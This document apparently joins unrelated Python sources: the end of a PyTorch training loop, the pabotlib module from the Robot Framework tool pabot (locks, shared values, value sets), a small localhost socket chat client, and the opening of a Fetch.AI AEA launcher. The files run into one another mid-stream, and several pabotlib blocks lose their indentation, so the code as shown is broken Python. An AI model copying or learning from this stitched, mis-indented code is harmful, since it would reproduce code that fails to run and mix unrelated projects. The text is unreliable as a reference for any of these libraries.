                print(colored('Distributed minibatch size : {} (global effective), {} (per rank)'.format(batch_size * distributed_world_size, batch_size), 'yellow', attrs=['bold']))
                print(colored('Distributed init.learn rate: {} (global), {} (base)'.format(learning_rate_init * math.sqrt(distributed_world_size), learning_rate_init), 'yellow', attrs=['bold']))
                print(colored('Distributed optimizer      : {}'.format(str(optimizer_type)), 'yellow', attrs=['bold']))
                print(colored('Distributed dataset size   : {:,}'.format(len(dataset)), 'yellow', attrs=['bold']))
                print(colored('Distributed num. buckets   : {:,}'.format(len(dataloader.batch_sampler._buckets)), 'yellow', attrs=['bold']))
                # bucket_size = math.ceil((len(dataset) / batch_size) / distributed_num_buckets)
                # print(colored('Distributed bucket size    : {:,} minibatches ({:,} traces)'.format(bucket_size, bucket_size * batch_size), 'yellow', attrs=['bold']))
        self.train()
        prev_total_train_seconds = self._total_train_seconds
        time_start = time.time()
        time_loss_min = time_start
        time_last_batch = time_start
        if valid_every is None:
            valid_every = max(100, num_traces / 1000)
        last_validation_trace = -valid_every + 1
        valid_loss = 0
        # Hyperparameters are only adopted the first time optimize() is called;
        # on resumed training the stored values win.
        if self._optimizer_type is None:
            self._optimizer_type = optimizer_type
        if self._momentum is None:
            self._momentum = momentum
        if self._weight_decay is None:
            self._weight_decay = weight_decay
        if self._learning_rate_scheduler_type is None:
            self._learning_rate_scheduler_type = learning_rate_scheduler_type
        if self._learning_rate_init is None:
            self._learning_rate_init = learning_rate_init * math.sqrt(distributed_world_size)
        if self._learning_rate_end is None:
            self._learning_rate_end = learning_rate_end
        if self._total_train_traces_end is None:
            self._total_train_traces_end = num_traces_end
        epoch = 0
        trace = 0
        stop = False
        print('Train. time | Epoch| Trace | Init. loss| Min. loss | Curr. loss| T.since min | Learn.rate| Traces/sec')
        max_print_line_len = 0
        loss_min_str = ''
        time_since_loss_min_str = ''
        loss_init_str = '' if self._loss_init is None else '{:+.2e}'.format(self._loss_init)
        if save_every_sec is not None:
            last_auto_save_time = time_start - save_every_sec
        last_print = time_start - util._print_refresh_rate
        if (distributed_rank == 0) and log_file_name is not None:
            log_file = open(log_file_name, mode='w', buffering=1)
            log_file.write('time, iteration, trace, loss, valid_loss, learning_rate, mean_trace_length_controlled, sub_mini_batches, distributed_bucket_id, traces_per_second\n')
        while not stop:
            epoch += 1
            for i_batch, batch in enumerate(dataloader):
                time_batch = time.time()
                # Important, a self._distributed_sync_parameters() needs to happen at the very beginning of a training
                if (distributed_world_size > 1) and (self._total_train_iterations % distributed_params_sync_every_iter == 0):
                    self._distributed_sync_parameters()
                if self._layers_pre_generated:  # and (distributed_world_size > 1):
                    layers_changed = False
                else:
                    layers_changed = self._polymorph(batch)
                if (self._optimizer is None) or layers_changed:
                    # New parameters appeared: rebuild optimizer and scheduler.
                    self._create_optimizer()
                    self._create_lr_scheduler()
                # print(self._optimizer.state[self._optimizer.param_groups[0]['params'][0]])
                self._optimizer.zero_grad()
                success, loss = self._loss(batch)
                if not success:
                    print(colored('Cannot compute loss, skipping batch. Loss: {}'.format(loss), 'red', attrs=['bold']))
                    if stop_with_bad_loss:
                        return
                else:
                    loss.backward()
                    if distributed_world_size > 1:
                        self._distributed_sync_grad(distributed_world_size)
                    self._optimizer.step()
                    loss = float(loss)
                    if (distributed_world_size > 1):
                        loss = self._distributed_update_train_loss(loss, distributed_world_size)
                    if self._loss_init is None:
                        self._loss_init = loss
                        self._loss_max = loss
                        loss_init_str = '{:+.2e}'.format(self._loss_init)
                    # loss_max_str = '{:+.3e}'.format(self._loss_max)
                    # Color the console loss green/red for improvement/regression.
                    if loss < self._loss_min:
                        self._loss_min = loss
                        loss_str = colored('{:+.2e}'.format(loss), 'green', attrs=['bold'])
                        loss_min_str = colored('{:+.2e}'.format(self._loss_min), 'green', attrs=['bold'])
                        time_loss_min = time_batch
                        time_since_loss_min_str = colored(util.days_hours_mins_secs_str(0), 'green', attrs=['bold'])
                    elif loss > self._loss_max:
                        self._loss_max = loss
                        loss_str = colored('{:+.2e}'.format(loss), 'red', attrs=['bold'])
                        # loss_max_str = colored('{:+.3e}'.format(self._loss_max), 'red', attrs=['bold'])
                    else:
                        if loss < self._loss_previous:
                            loss_str = colored('{:+.2e}'.format(loss), 'green')
                        elif loss > self._loss_previous:
                            loss_str = colored('{:+.2e}'.format(loss), 'red')
                        else:
                            loss_str = '{:+.2e}'.format(loss)
                        loss_min_str = '{:+.2e}'.format(self._loss_min)
                        # loss_max_str = '{:+.3e}'.format(self._loss_max)
                        time_since_loss_min_str = util.days_hours_mins_secs_str(time_batch - time_loss_min)
                    self._loss_previous = loss
                    self._total_train_iterations += 1
                    trace += batch.size * distributed_world_size
                    self._total_train_traces += batch.size * distributed_world_size
                    self._total_train_seconds = prev_total_train_seconds + (time_batch - time_start)
                    self._history_train_loss.append(loss)
                    self._history_train_loss_trace.append(self._total_train_traces)
                    traces_per_second = batch.size * distributed_world_size / (time_batch - time_last_batch)
                    if dataset_valid is not None:
                        if trace - last_validation_trace > valid_every:
                            print('\nComputing validation loss')
                            valid_loss = 0
                            with torch.no_grad():
                                for i_batch, batch in enumerate(dataloader_valid):
                                    _, v = self._loss(batch)
                                    valid_loss += v
                            valid_loss = float(valid_loss) / (len(dataloader_valid) / distributed_world_size)
                            if distributed_world_size > 1:
                                valid_loss = self._distributed_update_valid_loss(valid_loss, distributed_world_size)
                            self._history_valid_loss.append(valid_loss)
                            self._history_valid_loss_trace.append(self._total_train_traces)
                            last_validation_trace = trace - 1
                    if (distributed_rank == 0) and (save_file_name_prefix is not None) and (save_every_sec is not None):
                        # Periodic wall-clock checkpoint (rank 0 only).
                        if time_batch - last_auto_save_time > save_every_sec:
                            last_auto_save_time = time_batch
                            file_name = '{}_{}_traces_{}.network'.format(save_file_name_prefix, util.get_time_stamp(), self._total_train_traces)
                            print('\rSaving to disk...  ', end='\r')
                            self._save(file_name)
                    time_last_batch = time_batch
                    if trace >= num_traces:
                        print('\nStop condition reached. num_traces: {}'.format(num_traces))
                        stop = True
                    if self._total_train_traces >= self._total_train_traces_end:
                        print(colored('\nStop condition reached. num_traces_end set during network generation: {}'.format(self._total_train_traces_end), 'red', attrs=['bold']))
                        if self._learning_rate_scheduler is not None:
                            warnings.warn('Continuing training with learning rate scheduler beyond num_traces_end, make sure this is intended'.format(self._total_train_traces_end))
                        # stop = True
                    if self._learning_rate_scheduler is not None:
                        self._learning_rate_scheduler.step(self._total_train_traces)  # Gives a DeprecationWarning with PyTorch 1.4.0
                    learning_rate_current = self._optimizer.param_groups[0]['lr']
                    learning_rate_current_str = '{:+.2e}'.format(learning_rate_current)
                    if (time_batch - last_print > util._print_refresh_rate) or stop:
                        # Throttled single-line progress report.
                        last_print = time_batch
                        total_training_seconds_str = util.days_hours_mins_secs_str(self._total_train_seconds)
                        epoch_str = '{:4}'.format('{:,}'.format(epoch))
                        total_train_traces_str = '{:9}'.format('{:,}'.format(self._total_train_traces))
                        traces_per_second_str = '{:,.1f}'.format(traces_per_second)
                        print_line = '{} | {} | {} | {} | {} | {} | {} | {} | {} '.format(total_training_seconds_str, epoch_str, total_train_traces_str, loss_init_str, loss_min_str, loss_str, time_since_loss_min_str, learning_rate_current_str, traces_per_second_str)
                        max_print_line_len = max(len(print_line), max_print_line_len)
                        print(print_line.ljust(max_print_line_len), end='\r')
                        sys.stdout.flush()
                    if (distributed_rank == 0) and log_file_name is not None:
                        bucket_id = None
                        if isinstance(dataloader.batch_sampler, DistributedTraceBatchSampler):
                            bucket_id = dataloader.batch_sampler._current_bucket_id
                        log_file.write('{}, {}, {}, {}, {}, {}, {}, {}, {}, {}\n'.format(self._total_train_seconds, self._total_train_iterations, self._total_train_traces, loss, valid_loss, learning_rate_current, batch.mean_length_controlled, len(batch.sub_batches), bucket_id, traces_per_second))
                    if stop:
                        break
        if (distributed_rank == 0) and log_file_name is not None:
            log_file.close()
        print()
        if (distributed_rank == 0) and (save_file_name_prefix is not None):
            # Final checkpoint after the training loop ends.
            file_name = '{}_{}_traces_{}.network'.format(save_file_name_prefix, util.get_time_stamp(), self._total_train_traces)
            print('\rSaving to disk...  ', end='\r')
            self._save(file_name)
# pabotlib.py
# Copyright 2014->future! Mikko Korpela
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from robot.errors import RobotError
try:
import configparser # type: ignore
except:
import ConfigParser as configparser # type: ignore
# Support Python 2
from robot.libraries.BuiltIn import BuiltIn
from .robotremoteserver import RobotRemoteServer
from robot.libraries.Remote import Remote
from robot.running import TestLibrary
from robot.api import logger
import threading
import time
from typing import List, Dict, Tuple, Set, Optional, Any
# Names of pabot-level parallel values / variables shared across processes.
PABOT_LAST_LEVEL = "PABOTLASTLEVEL"
PABOT_QUEUE_INDEX = "PABOTQUEUEINDEX"
PABOT_LAST_EXECUTION_IN_POOL = "PABOTISLASTEXECUTIONINPOOL"
PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE = "pabot_min_queue_index_executing"
class _PabotLib(object):
    """In-process backend for pabot coordination: reentrant named locks,
    shared key/value pairs, reservable value sets and remote library servers."""

    _TAGS_KEY = "tags"

    def __init__(self, resourcefile=None):  # type: (Optional[str]) -> None
        self._locks = {}  # type: Dict[str, Tuple[str, int]]
        self._owner_to_values = {}  # type: Dict[str, Dict[str, object]]
        self._parallel_values = {}  # type: Dict[str, object]
        self._remote_libraries = {}  # type: Dict[str, Tuple[int, RobotRemoteServer, threading.Thread]]
        self._values = self._parse_values(resourcefile)
        self._added_suites = []  # type: List[Tuple[str, List[str]]]
        self._ignored_executions = set()  # type: Set[str]

    def _parse_values(self, resourcefile):  # type: (Optional[str]) -> Dict[str, Dict[str, Any]]
        """Read value sets from an ini-style resource file, normalizing the tags entry to a list."""
        if resourcefile is None:
            return {}
        parser = configparser.ConfigParser()
        parser.read(resourcefile)
        parsed = {
            section: {option: parser.get(section, option) for option in parser.options(section)}
            for section in parser.sections()
        }
        for section_values in parsed.values():
            if self._TAGS_KEY in section_values:
                section_values[self._TAGS_KEY] = [t.strip() for t in section_values[self._TAGS_KEY].split(",")]
            else:
                section_values[self._TAGS_KEY] = []
        return parsed

    def set_parallel_value_for_key(self, key, value):  # type: (str, object) -> None
        self._parallel_values[key] = value

    def get_parallel_value_for_key(self, key):  # type: (str) -> object
        return self._parallel_values.get(key, "")

    def acquire_lock(self, name, caller_id):  # type: (str, str) -> bool
        """Take (or re-enter) the named lock; False when another caller holds it."""
        owner, count = self._locks.get(name, (caller_id, 0))
        if owner != caller_id:
            return False
        self._locks[name] = (caller_id, count + 1)
        return True

    def release_lock(self, name, caller_id):  # type: (str, str) -> None
        """Leave one reentrancy level; the lock disappears when the count hits zero."""
        owner, count = self._locks[name]
        assert owner == caller_id
        count -= 1
        if count == 0:
            del self._locks[name]
        else:
            self._locks[name] = (caller_id, count)

    def release_locks(self, caller_id):
        # type: (str) -> None
        """Release one level of every lock currently held by caller_id."""
        for key in list(self._locks.keys()):
            owner, count = self._locks[key]
            if owner != caller_id:
                continue
            count -= 1
            if count == 0:
                del self._locks[key]
            else:
                self._locks[key] = (caller_id, count)

    def acquire_value_set(self, caller_id, *tags):
        """Reserve the first free value set whose tags include all given tags."""
        if not self._values:
            raise AssertionError(
                'Value set cannot be aquired. It was never imported or all are disabled. Use --resourcefile option to import.')
        # CAN ONLY RESERVE ONE VALUE SET AT A TIME
        if self._owner_to_values.get(caller_id) is not None:
            raise ValueError("Caller has already reserved a value set.")
        found_match = False
        for setname, valueset in self._values.items():
            if not all(tag in valueset[self._TAGS_KEY] for tag in tags):
                continue
            found_match = True
            if valueset not in self._owner_to_values.values():
                self._owner_to_values[caller_id] = valueset
                return (setname, valueset)
        if not found_match:
            raise ValueError("No value set matching given tags exists.")
        # Every matching set is taken; caller should poll until one is freed.
        return (None, None)

    def release_value_set(self, caller_id):  # type: (str) -> None
        self._owner_to_values.pop(caller_id, None)

    def disable_value_set(self, setname, caller_id):  # type: (str, str) -> None
        del self._owner_to_values[caller_id]
        del self._values[setname]

    def get_value_from_set(self, key, caller_id):  # type: (str, str) -> object
        if caller_id not in self._owner_to_values:
            raise AssertionError('No value set reserved for caller process')
        reserved = self._owner_to_values[caller_id]
        if key not in reserved:
            raise AssertionError('No value for key "%s"' % key)
        return reserved[key]

    def import_shared_library(self, name):  # type: (str) -> int
        """Start (once) a remote server exposing the named library; return its port."""
        if name in self._remote_libraries:
            return self._remote_libraries[name][0]
        library = TestLibrary(name)
        server = RobotRemoteServer(library.get_instance(), port=0, serve=False, allow_stop=True)
        server_thread = threading.Thread(target=server.serve)
        server_thread.start()
        time.sleep(1)  # give the server a moment to bind its port
        port = server.server_port
        self._remote_libraries[name] = (port, server, server_thread)
        return port

    def add_suite_to_execution_queue(self, suitename, variables):  # type: (str, List[str]) -> None
        self._added_suites.append((suitename, variables or []))

    def get_added_suites(self):  # type: () -> List[Tuple[str, List[str]]]
        """Return (and clear) the suites queued since the last call."""
        suites, self._added_suites = self._added_suites, []
        return suites

    def ignore_execution(self, caller_id):  # type: (str) -> None
        self._ignored_executions.add(caller_id)

    def is_ignored_execution(self, caller_id):  # type: (str) -> bool
        return caller_id in self._ignored_executions

    def stop_remote_libraries(self):
        """Ask every remote library server to stop, then join their threads."""
        for _port, server, _thread in self._remote_libraries.values():
            server.stop_remote_server()
        for _port, _server, thread in self._remote_libraries.values():
            thread.join()
class PabotLib(_PabotLib):
    """Robot Framework library/listener that proxies _PabotLib keywords over a remote server."""
    __version__ = 0.67
    ROBOT_LIBRARY_SCOPE = 'GLOBAL'
    ROBOT_LISTENER_API_VERSION = 2
    # Polling configuration is class-level so all instances share it.
    _pollingSeconds_SetupTeardown = 0.3
    _pollingSeconds = 0.1
    _polling_logging = True
    def __init__(self):
        _PabotLib.__init__(self)
        self.__remotelib = None  # lazily created Remote proxy (see _remotelib)
        self.__my_id = None  # lazily resolved ${CALLER_ID} (see _my_id)
        self._valueset = None
        self._setname = None
        # Register this library instance as its own Robot listener.
        self.ROBOT_LIBRARY_LISTENER = self
        self._position = []  # type: List[str]
        self._row_index = 0
    def _start(self, name, attributes):
        # Listener hook for suite/test start: push the item's long name.
        self._position.append(attributes["longname"])
    def _end(self, name, attributes):
        # Listener hook for suite/test end: pop, keeping a sensible root entry
        # (the longname with this item's own name stripped off).
        self._position = self._position[:-1] if len(self._position) > 1 else [attributes["longname"][:-len(name)-1]]
    def _start_keyword(self, name, attributes):
        # Extend the dotted row-index path (e.g. '0.1.2') identifying the current keyword.
        if not(self._position):
            self._position = ['0', '0.' + str(self._row_index)]
        else:
            self._position.append(self._position[-1] + "." + str(self._row_index))
        self._row_index = 0
    def _end_keyword(self, name, attributes):
        if not(self._position):
            self._row_index = 1
            self._position = ['0']
            return
        splitted = self._position[-1].split(".")
        # Restore the parent's row index and advance it past this keyword.
        self._row_index = int(splitted[-1]) if len(splitted) > 1 else 0
        self._row_index += 1
        self._position = self._position[:-1] if len(self._position) > 1 else [str(int(splitted[0])+1)]
    # Suite and test events share the generic start/end handlers above.
    _start_suite = _start_test = _start
    _end_suite = _end_test = _end
    def _close(self):
        # Listener close hook: best-effort release of locks and value sets.
        # NOTE(review): release_locks/release_value_set are called without
        # arguments here while _PabotLib's versions take caller_id — presumably
        # remote-aware overrides exist later in this class; confirm.
        try:
            self.release_locks()
            self.release_value_set()
        except RuntimeError as err:
            # This is just last line of defence
            # Ignore connection errors if library server already closed
            logger.console("pabot.PabotLib#_close: threw an exception: is --pabotlib flag used? ErrorDetails: {0}".format(repr(err)), stream='stderr')
            pass
@property
def _path(self):
if len(self._position) < 1:
return ""
return self._position[-1]
    @property
    def _my_id(self):
        # Caller id from the ${CALLER_ID} Robot variable, cached after first lookup.
        if self.__my_id is None:
            my_id = BuiltIn().get_variable_value('${CALLER_ID}')
            logger.debug('Caller ID is %r' % my_id)
            self.__my_id = my_id if my_id else None
        return self.__my_id
    @property
    def _remotelib(self):
        # Remote proxy to the shared PabotLib server (from ${PABOTLIBURI}),
        # created lazily; None when no URI is set (no --pabotlib).
        if self.__remotelib is None:
            uri = BuiltIn().get_variable_value('${PABOTLIBURI}')
            logger.debug('PabotLib URI %r' % uri)
            self.__remotelib = Remote(uri) if uri else None
        return self.__remotelib
def set_polling_seconds(self, secs):
"""
Determine the amount of seconds to wait between checking for free locks. Default: 0.1 (100ms)
"""
PabotLib._pollingSeconds = secs
def set_polling_seconds_setupteardown(self, secs):
"""
Determine the amount of seconds to wait between checking for free locks during setup and teardown. Default: 0.3 (300ms)
"""
PabotLib._pollingSeconds_SetupTeardown = secs
def set_polling_logging(self, enable):
"""
Enable or disable logging inside of polling. Logging inside of polling can be disabled (enable=False) to reduce log file size.
"""
if isinstance(enable,str): enable = (enable.lower()=='true')
PabotLib._polling_logging = bool(enable)
def run_setup_only_once(self, keyword, *args):
    """
    Runs a keyword only once at the first possible moment when
    an execution has gone through this step.
    [https://pabot.org/PabotLib.html?ref=log#run-setup-only-once|Open online docs.]
    """
    # Lock name derives from the current execution position, scoping the
    # "once" guarantee to this exact setup step.
    lock_name = 'pabot_setup_%s' % self._path
    try:
        self.acquire_lock(lock_name)
        passed = self.get_parallel_value_for_key(lock_name)
        if passed != '':
            # Another process already ran the setup; mirror its result.
            if passed == 'FAILED':
                raise AssertionError('Setup failed in other process')
            logger.info("Setup skipped in this item")
            return
        BuiltIn().run_keyword(keyword, *args)
        self.set_parallel_value_for_key(lock_name, 'PASSED')
    except:
        # Record the failure so sibling processes fail fast too.
        self.set_parallel_value_for_key(lock_name, 'FAILED')
        raise
    finally:
        self.release_lock(lock_name)

def run_only_once(self, keyword):
    """
    Runs a keyword only once in one of the parallel processes.
    [https://pabot.org/PabotLib.html?ref=log#run-only-once|Open online docs.]
    """
    lock_name = 'pabot_run_only_once_%s' % keyword
    try:
        self.acquire_lock(lock_name)
        passed = self.get_parallel_value_for_key(lock_name)
        if passed != '':
            if passed == 'FAILED':
                raise AssertionError('Keyword failed in other process')
            logger.info("Skipped in this item")
            return
        BuiltIn().run_keyword(keyword)
        self.set_parallel_value_for_key(lock_name, 'PASSED')
    except:
        self.set_parallel_value_for_key(lock_name, 'FAILED')
        raise
    finally:
        self.release_lock(lock_name)

def run_teardown_only_once(self, keyword, *args):
    """
    Runs a keyword only once after all executions have gone through this step in the last possible moment.
    [https://pabot.org/PabotLib.html?ref=log#run-teardown-only-once|Open online docs.]
    """
    last_level = BuiltIn().get_variable_value('${%s}' % PABOT_LAST_LEVEL)
    if last_level is None:
        # Not running under pabot: just run the keyword normally.
        BuiltIn().run_keyword(keyword, *args)
        return
    logger.trace('Current path "%s" and last level "%s"' % (self._path, last_level))
    if not self._path.startswith(last_level):
        logger.info("Teardown skipped in this item")
        return
    queue_index = int(BuiltIn().get_variable_value('${%s}' % PABOT_QUEUE_INDEX) or 0)
    logger.trace("Queue index (%d)" % queue_index)
    if self._remotelib:
        # Wait until every earlier queue item has finished executing.
        while self.get_parallel_value_for_key(PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE) < queue_index:
            if PabotLib._polling_logging: logger.trace(self.get_parallel_value_for_key(PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE))
            time.sleep(PabotLib._pollingSeconds_SetupTeardown)
    logger.trace("Teardown conditions met. Executing keyword.")
    BuiltIn().run_keyword(keyword, *args)

def run_on_last_process(self, keyword):
    """
    Runs a keyword only on last process used by pabot.
    [https://pabot.org/PabotLib.html?ref=log#run-on-last-process|Open online docs.]
    """
    is_last = int(BuiltIn().get_variable_value('${%s}' % PABOT_LAST_EXECUTION_IN_POOL) or 1) == 1
    if not is_last:
        logger.info("Skipped in this item")
        return
    queue_index = int(BuiltIn().get_variable_value('${%s}' % PABOT_QUEUE_INDEX) or 0)
    if queue_index > 0 and self._remotelib:
        # Wait for the server-side signal that only the last item remains.
        while self.get_parallel_value_for_key('pabot_only_last_executing') != 1:
            time.sleep(PabotLib._pollingSeconds_SetupTeardown)
    BuiltIn().run_keyword(keyword)
def set_parallel_value_for_key(self, key, value):
    """
    Set a globally available key and value that can be accessed
    from all the pabot processes.
    [https://pabot.org/PabotLib.html?ref=log#set-parallel-value-for-key|Open online docs.]
    """
    self._run_with_lib('set_parallel_value_for_key', key, value)

def _run_with_lib(self, keyword, *args):
    # Dispatch a keyword to the shared pabotlib server when connected,
    # otherwise fall back to the local in-process _PabotLib implementation.
    if self._remotelib:
        try:
            return self._remotelib.run_keyword(keyword, args, {})
        except RuntimeError as err:
            logger.error("RuntimeError catched in remotelib keyword execution. Maybe there is no connection - is pabot called with --pabotlib option? ErrorDetails: {0}".format(repr(err)))
            # Drop the broken proxy so it is re-created on next access.
            self.__remotelib = None
            raise
    return getattr(_PabotLib, keyword)(self, *args)

def add_suite_to_execution_queue(self, suitename, *variables):
    # Queue a dynamically discovered suite for execution (pabot internal).
    self._run_with_lib('add_suite_to_execution_queue', suitename, variables)

def get_parallel_value_for_key(self, key):
    """
    Get the value for a key. If there is no value for the key then empty
    string is returned.
    [https://pabot.org/PabotLib.html?ref=log#get-parallel-value-for-key|Open online docs.]
    """
    return self._run_with_lib('get_parallel_value_for_key', key)

def acquire_lock(self, name):
    """
    Wait for a lock with name.
    [https://pabot.org/PabotLib.html?ref=log#acquire-lock|Open online docs.]
    """
    if self._remotelib:
        try:
            # Poll the server until the lock is granted to this caller.
            while not self._remotelib.run_keyword('acquire_lock',
                                                  [name, self._my_id], {}):
                time.sleep(PabotLib._pollingSeconds)
                if PabotLib._polling_logging: logger.debug('waiting for lock to release')
            return True
        except RuntimeError as err:
            logger.error("RuntimeError catched in remote acquire_lock execution. Maybe there is no connection - is pabot called with --pabotlib option? ErrorDetails: {0}".format(repr(err)))
            self.__remotelib = None
            raise
    return _PabotLib.acquire_lock(self, name, self._my_id)

def release_lock(self, name):
    """
    Release a lock with name.
    [https://pabot.org/PabotLib.html?ref=log#release-lock|Open online docs.]
    """
    self._run_with_lib('release_lock', name, self._my_id)

def release_locks(self):
    """
    Release all locks called by instance.
    [https://pabot.org/PabotLib.html?ref=log#release-locks|Open online docs.]
    """
    self._run_with_lib('release_locks', self._my_id)
def acquire_value_set(self, *tags):
    """
    Reserve a set of values for this execution.
    [https://pabot.org/PabotLib.html?ref=log#acquire-value-set|Open online docs.]

    :param tags: optional tags the value set must match
    :return: the name of the acquired value set
    :raises ValueError: when no matching value set could be acquired
    """
    setname = self._acquire_value_set(*tags)
    if setname is None:
        # Fix: error message previously misspelled "acquire" as "aquire".
        raise ValueError("Could not acquire a value set")
    return setname
def _acquire_value_set(self, *tags):
    # Poll the remote pabotlib server until a value set matching the tags
    # becomes free; without a remote, fall back to the local implementation.
    if self._remotelib:
        try:
            while True:
                self._setname, self._valueset = self._remotelib.run_keyword('acquire_value_set',
                                                                            [self._my_id]+list(tags), {})
                if self._setname:
                    logger.info('Value set "%s" acquired' % self._setname)
                    return self._setname
                time.sleep(PabotLib._pollingSeconds)
                if PabotLib._polling_logging: logger.debug('waiting for a value set')
        except RuntimeError as err:
            logger.error("RuntimeError catched in remote _acquire_value_set execution. Maybe there is no connection - is pabot called with --pabotlib option? ErrorDetails: {0}".format(repr(err)))
            # Drop the broken proxy so it is re-created on next access.
            self.__remotelib = None
            raise
    self._setname, self._valueset = _PabotLib.acquire_value_set(self, self._my_id, *tags)
    return self._setname
def get_value_from_set(self, key):
    """
    Get a value from previously reserved value set.
    [https://pabot.org/PabotLib.html?ref=log#get-value-from-set|Open online docs.]

    Keys are matched case-insensitively (lower-cased before lookup).
    """
    if self._valueset is None:
        raise AssertionError('No value set reserved for caller process')
    normalized = key.lower()
    try:
        return self._valueset[normalized]
    except KeyError:
        raise AssertionError('No value for key "%s"' % normalized)
def ignore_execution(self):
    # Tell the server to ignore this execution's results, then abort the
    # whole process with a non-continuable Robot error.
    self._run_with_lib('ignore_execution', self._my_id)
    error = RobotError('Ignore')
    error.ROBOT_EXIT_ON_FAILURE = True
    error.ROBOT_CONTINUE_ON_FAILURE = False
    raise error

def release_value_set(self):
    """
    Release a reserved value set so that other executions can use it also.
    [https://pabot.org/PabotLib.html?ref=log#release-value-set|Open online docs.]
    """
    self._valueset = None
    self._setname = None
    self._run_with_lib('release_value_set', self._my_id)

def disable_value_set(self):
    """
    Disable a reserved value set.
    [https://pabot.org/PabotLib.html?ref=log#disable-value-set|Open online docs.]
    """
    self._valueset = None
    self._run_with_lib('disable_value_set', self._setname, self._my_id)
    self._setname = None
# Module import will give a bad error message in log file
# Workaround: expose PabotLib also as pabotlib
pabotlib = PabotLib

if __name__ == '__main__':
    # Started standalone: serve the shared _PabotLib state as a remote
    # library server (argv: resource-file, host, port).
    import sys
    RobotRemoteServer(_PabotLib(sys.argv[1]), host=sys.argv[2],
                      port=sys.argv[3], allow_stop=True)
|
client.py | #client
import socket
from threading import Thread
def send():
    # Sender loop: read lines from stdin forever and forward each one to
    # the server over the module-level socket `conn`.
    # NOTE(review): blocks in input(); the thread ends with the process.
    while True:
        message = input()
        conn.send(message.encode('utf-8'))
def get():
    """Receiver loop: print server messages until the connection closes."""
    while True:
        data = conn.recv(9988)
        if not data:
            # Fix: recv() returns b'' once the peer closes the connection;
            # the old code then spun forever printing empty strings.
            break
        print(data.decode('utf-8'))
# Connect to the local chat server, then run the sender and receiver
# loops concurrently on two threads sharing the same socket.
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect(('127.0.0.1', 10203))
Thread(target=send).start()
Thread(target=get).start()
|
launcher.py | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the implementation of multiple AEA configs launcher."""
import logging
import multiprocessing
from asyncio.events import AbstractEventLoop
from concurrent.futures.process import BrokenProcessPool
from multiprocessing.synchronize import Event
from os import PathLike
from threading import Thread
from typing import Any, Callable, Dict, Optional, Sequence, Tuple, Type, Union
from aea.aea import AEA
from aea.aea_builder import AEABuilder
from aea.exceptions import AEAException
from aea.helpers.base import cd
from aea.helpers.multiple_executor import (
AbstractExecutorTask,
AbstractMultipleExecutor,
AbstractMultipleRunner,
AbstractMultiprocessExecutorTask,
AsyncExecutor,
ExecutorExceptionPolicies,
ProcessExecutor,
TaskAwaitable,
ThreadExecutor,
)
from aea.runtime import AsyncRuntime
_default_logger = logging.getLogger(__name__)
def load_agent(agent_dir: Union[PathLike, str]) -> AEA:
    """
    Load AEA from directory.

    :param agent_dir: agent configuration directory
    :return: AEA instance
    """
    # Build from the project in place; cd() restores the cwd afterwards.
    with cd(agent_dir):
        return AEABuilder.from_aea_project(".").build()
def _set_logger(
    log_level: Optional[str],
):  # pragma: nocover # used in spawned process and pytest does not see this code
    """Configure the "aea" logger inside a spawned agent process."""
    # Imported lazily to avoid pulling CLI dependencies at module import time.
    from aea.cli.utils.loggers import (  # pylint: disable=import-outside-toplevel
        default_logging_config,
    )

    logger_ = logging.getLogger("aea")
    logger_ = default_logging_config(logger_)
    if log_level is not None:
        level = logging.getLevelName(log_level)
        logger_.setLevel(level)
def _run_agent(
    agent_dir: Union[PathLike, str], stop_event: Event, log_level: Optional[str] = None
) -> None:
    """
    Load and run agent in a dedicated process.

    :param agent_dir: agent configuration directory
    :param stop_event: multithreading Event to stop agent run.
    :param log_level: debug level applied for AEA in subprocess
    :return: None
    """
    import asyncio  # pylint: disable=import-outside-toplevel
    import select  # pylint: disable=import-outside-toplevel
    import selectors  # pylint: disable=import-outside-toplevel

    if hasattr(select, "kqueue"):  # pragma: nocover # cause platform specific
        # On kqueue platforms (BSD/macOS) force the plain select()-based
        # event loop instead of the default selector.
        selector = selectors.SelectSelector()
        loop = asyncio.SelectorEventLoop(selector)  # type: ignore
        asyncio.set_event_loop(loop)

    _set_logger(log_level=log_level)

    agent = load_agent(agent_dir)

    def stop_event_thread():
        # Runs on a daemon thread: block until the parent signals shutdown,
        # then stop the agent's runtime.
        try:
            stop_event.wait()
        except (KeyboardInterrupt, EOFError, BrokenPipeError) as e:  # pragma: nocover
            _default_logger.error(
                f"Exception raised in stop_event_thread {e} {type(e)}. Skip it, looks process is closed."
            )
        finally:
            _default_logger.debug("_run_agent: stop event raised. call agent.stop")
            agent.runtime.stop()

    Thread(target=stop_event_thread, daemon=True).start()
    try:
        agent.start()
    except KeyboardInterrupt:  # pragma: nocover
        _default_logger.debug("_run_agent: keyboard interrupt")
    except BaseException as e:  # pragma: nocover
        _default_logger.exception("exception in _run_agent")
        # Re-raise as an AEAException so the error crosses the process
        # boundary back to the parent in a picklable form.
        exc = AEAException(f"Raised {type(e)}({e})")
        exc.__traceback__ = e.__traceback__
        raise exc
    finally:
        _default_logger.debug("_run_agent: call agent.stop")
        agent.stop()
class AEADirTask(AbstractExecutorTask):
    """Task to run agent from agent configuration directory."""

    def __init__(self, agent_dir: Union[PathLike, str]) -> None:
        """
        Init aea config dir task.

        :param agent_dir: directory with aea config.
        """
        self._agent_dir = agent_dir
        # Build the agent eagerly so configuration errors surface here.
